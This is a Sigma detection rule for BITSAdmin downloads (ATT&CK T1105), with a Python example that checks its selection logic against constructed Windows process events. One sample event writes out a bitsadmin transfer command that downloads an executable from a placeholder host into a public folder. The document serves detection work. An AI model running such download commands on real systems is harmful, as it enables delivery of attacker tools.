BITSAdmin Downloading Malicious Binaries

Detects usage of BITSAdmin to download malicious code. Inspired by the 2022 Red Canary Threat Detection report.

Sigma rule

```yaml
title: BITSAdmin Downloading Malicious Binaries
id: c7568c9e-f6c6-4cb7-a3c0-da356aef51d8
status: experimental
description: Detects usage of BITSAdmin to download malicious code. Inspired by the
  2022 Red Canary Threat Detection report.
references:
    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md#atomic-test-9---windows---bitsadmin-bits-download
author: Micah Babinski
date: 2022/11/03
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\bitsadmin.exe'
        CommandLine|contains:
            - 'download'
            - 'transfer'
    condition: selection
falsepositives:
    - Unknown
level: high
```
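To show what the `selection` block above actually matches, here is an added example (not part of the rule or its repository) that evaluates the same logic over constructed Windows process_creation events. Sigma's `|endswith` and `|contains` modifiers are case-insensitive and a list under `|contains` is an OR, which the code reproduces; the event field names mirror the rule, while the sample command lines and helper names are assumptions.

```python
# Added example: applies the Sigma 'selection' from the rule above to
# constructed process_creation events. Sigma string modifiers are
# case-insensitive, so both sides are lower-cased before comparison.
# Event contents and helper names are assumptions, not from the rule.
from typing import Iterable

IMAGE_SUFFIX = "\\bitsadmin.exe"          # Image|endswith
COMMANDLINE_TERMS = ("download", "transfer")  # CommandLine|contains (OR)


def matches_rule(event: dict) -> bool:
    """Return True when the event satisfies the rule's 'selection'."""
    image = str(event.get("Image", "")).lower()
    cmdline = str(event.get("CommandLine", "")).lower()
    if not image.endswith(IMAGE_SUFFIX):
        return False
    # A list under |contains matches if any listed value is a substring.
    return any(term in cmdline for term in COMMANDLINE_TERMS)


def find_alerts(events: Iterable[dict]) -> list:
    """Return the events that trigger the rule, in input order."""
    return [e for e in events if matches_rule(e)]


# Constructed sample events (not real telemetry), shaped like the Image and
# CommandLine fields of a Windows process_creation log such as Sysmon EID 1.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job /download /priority high "
                    "https://files.example.test/tool.exe C:\\Users\\Public\\tool.exe"},
    # Mixed case: still matches, since the modifiers are case-insensitive.
    {"Image": "C:\\Windows\\System32\\BITSADMIN.EXE",
     "CommandLine": "BITSADMIN /Transfer updatejob "
                    "https://updates.example.test/patch.msi C:\\Temp\\patch.msi"},
    # bitsadmin without download/transfer: no match.
    {"Image": "C:\\Windows\\System32\\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers"},
    # Keyword present but the image is not bitsadmin.exe: no match.
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c echo download"},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print("ALERT:", alert["CommandLine"])
```

The second sample, an ordinary-looking update job, fires as well, which is the kind of event to review when tuning the rule's `falsepositives` for an environment that uses BITS legitimately.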
